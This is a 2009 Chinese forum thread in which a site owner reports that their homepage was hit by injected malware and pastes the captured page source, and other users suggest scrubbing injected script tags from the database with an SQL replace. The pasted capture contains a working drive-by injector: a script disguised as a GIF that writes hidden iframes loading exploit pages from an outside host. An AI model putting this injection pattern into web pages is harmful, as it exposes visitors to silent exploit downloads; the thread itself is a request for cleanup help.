网页挂马了怎么帮啊

zsyzzz 2009-06-17 05:12:50

From: <由 Windows Internet Explorer 7 保存>
Subject: =?gb2312?B?ofmh+aH5ofmh+aH5ofmh+aH5ofmh+aH5ofmh+aH5ofmh+aH5ofmh+Q==?=
=?gb2312?B?ofmh+aH5ofmh+aH5ofmh+Q==?=
Date: Wed, 17 Jun 2009 16:34:05 +0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0000_01C9EF69.6DE99940"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01C9EF69.6DE99940
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=
=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=
=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9=A1=F9</TITLE>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dgb2312">
<SCRIPT =
src=3D"http://cn.com.fengyunfz.com.cn/count/js/gif.gif"></SCRIPT>

<FORM name=3Dform action=3Dlog.asp method=3Dpost>
<META content=3D"MSHTML 6.00.6000.21045" name=3DGENERATOR></HEAD>
<BODY>=D3=C3=BB=A7=C3=FB=A3=BA<BR><INPUT =
name=3Dusername><BR>=C3=DC=C2=EB=A3=BA<BR><INPUT type=3Dpassword=20
name=3Dpassword><BR><INPUT type=3Dsubmit value=3D=B5=C7=C2=BD> <A=20
href=3D"http://home.66ip.com/3w/reg.html">=D7=A2=B2=E1</A> <A=20
href=3D"http://home.66ip.com/3w/set.html">=CD=FC=BC=C7=C3=DC=C2=EB=A3=BF<=
/A> </FORM></BODY></HTML>

------=_NextPart_000_0000_01C9EF69.6DE99940
Content-Type: image/gif
Content-Transfer-Encoding: quoted-printable
Content-Location: http://cn.com.fengyunfz.com.cn/count/js/gif.gif

function Get(){
var Then =3D new Date()=20
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString =3D new String(document.cookie)
var cookieHeader =3D "Cookie1=3D"=20
var beginPosition =3D cookieString.indexOf(cookieHeader)
if (beginPosition !=3D -1){=20
} else=20
{ document.cookie =3D "Cookie1=3Dnishisb;expires=3D"+ Then.toGMTString()
document.writeln("<iframe width=3D100 height=3D1 =
src=3Dhttp:\/\/cn.com.fengyunfz.com.cn\/images\/images\/bf.htm><\/iframe>=
");
document.writeln("<iframe width=3D100 height=3D1 =
src=3Dhttp:\/\/cn.com.fengyunfz.com.cn\/images\/images\/swf.htm><\/iframe=
>");
document.writeln("<iframe width=3D100 height=3D1 =
src=3Dhttp:\/\/cn.com.fengyunfz.com.cn\/images\/images\/real2.htm><\/ifra=
me>");
document.writeln("<iframe width=3D100 height=3D1 =
src=3Dhttp:\/\/cn.com.fengyunfz.com.cn\/images\/images\/old.htm><\/iframe=
>");
document.writeln("<iframe width=3D100 height=3D1 =
src=3Dhttp:\/\/cn.com.fengyunfz.com.cn\/images\/images\/09002.htm><\/ifra=
me>");
document.writeln("<iframe width=3D100 height=3D1 =
src=3Dhttp:\/\/cn.com.fengyunfz.com.cn\/images\/images\/tj.htm><\/iframe>=
");
}
}Get();
------=_NextPart_000_0000_01C9EF69.6DE99940--

这是在主页里的代码可是我在后台把主页下载下来的时候没有任何恶意代码但是打开主页就存在这些东东怎么清除掉啊郁闷。。。。。

...全文

119 7 打赏收藏转发到动态举报

写回复

用AI写文章

7 条回复

切换为时间正序

请发表友善的回复…

发表回复

ACMAIN_CHM 2009-06-23

打赏
举报

在数据库中检查，把内容用SQL语句 update .... 替换回就行了。

另外就是加强防范。

heyisheng 2009-06-22

打赏
举报

这种问题很严重，一般都是网站存在漏洞或者服务器存在漏洞而被攻击了，若需要安全技术服务请联系EMAIL & MSN：yisheng@hotmail.com， 7X24 为您的网站和服务器保驾护航。

yinxingshashou 2009-06-19

打赏
举报

靠 4楼真搞笑。。我也来获得 10分并祝楼主早日杀毒

logon29 2009-06-19

打赏
举报

回帖是一种美德！每天回帖即可获得 10 分可用分！

调皮的蟠桃 2009-06-19

打赏
举报

如果页面上没有问题,代码没有问题,你看一下数据库,自己看数据库中的每一张表,表里的内容是否有js或者script像这样类似的，这就说明注入了脚本，使用sql语句把这些脚本删除掉，在刷新数据库，在回头浏览网页。
sql语句为update 表名 set 列名=replace(convert(varchar(4000),列名),'<script src=http://r13.3322.org/c.js></script>','')
你试试看这个方法可以吗？记得如果可以的话，支持一下我哦！！o(∩_∩)o...

zsyzzz 2009-06-17